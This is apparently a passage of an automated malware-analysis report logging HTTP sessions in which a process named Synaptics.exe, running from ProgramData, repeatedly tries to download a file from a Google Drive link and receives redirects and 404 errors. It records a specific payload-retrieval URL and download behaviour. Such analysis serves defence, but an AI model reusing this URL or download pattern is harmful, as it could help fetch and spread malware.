                                                                                                                                        2024-12-30 10:46:24 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        10192.168.2.549723142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:24 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-wBov9MDRtYofUT7lnZYCcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        11192.168.2.549724142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:24 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:24 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lCM-VOi4GB8ojWalwACLCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        12192.168.2.549725142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:24 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                                                                                                                                        2024-12-30 10:46:25 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC65GHuUhtBjlaYCUURTznVflu6pJrqucO2NsOGhBhXV859lP0SoGFuXjy-J7cIPVhcA9NyjIjQ
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:25 GMT
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-bh9ThQyCviSXW9TAZPP2pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:25 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:25 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 73 4c 79 6b 44 51 30 77 72 32 54 34 57 35 39 4c 4a 46 4c 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="UsLykDQ0wr2T4W59LJFLUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:25 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        13192.168.2.549728142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:25 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                                                                                                                                        2024-12-30 10:46:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC7iLvb8YJnSAOAxRgJu6jit2o2nXZp4Xyq2neJoC-26-ZfsN19OKmABu3ti7riL9run
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:25 GMT
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-52CMQh1NzCaUhZ7y8Uhr2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 48 59 50 70 55 50 6e 38 46 76 30 6d 54 56 42 76 50 4f 55 7a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="jHYPpUPn8Fv0mTVBvPOUzA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        14192.168.2.549730142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        15192.168.2.549731142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:25 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        16192.168.2.549733142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        17192.168.2.549737142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:26 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yKhE5hexeVSqOy4sJToPTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        18192.168.2.549738142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:26 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:26 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:26 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DA5IPM1B_d0HVlMsmRfJXQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        19192.168.2.549743142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:27 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:27 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC6BihuvC21EXEIS39FTaH0fJlyF9JdWf_xS_PbyTTwFwj8NALRBrdgRphFz-hZAKJkI
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:27 GMT
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-XKEdl4sY34ADx8AOdZvzfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:27 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:27 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 4d 63 6f 39 33 6a 67 72 2d 50 37 6c 34 6f 62 32 38 5f 6d 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="sMco93jgr-P7l4ob28_mNw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:27 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
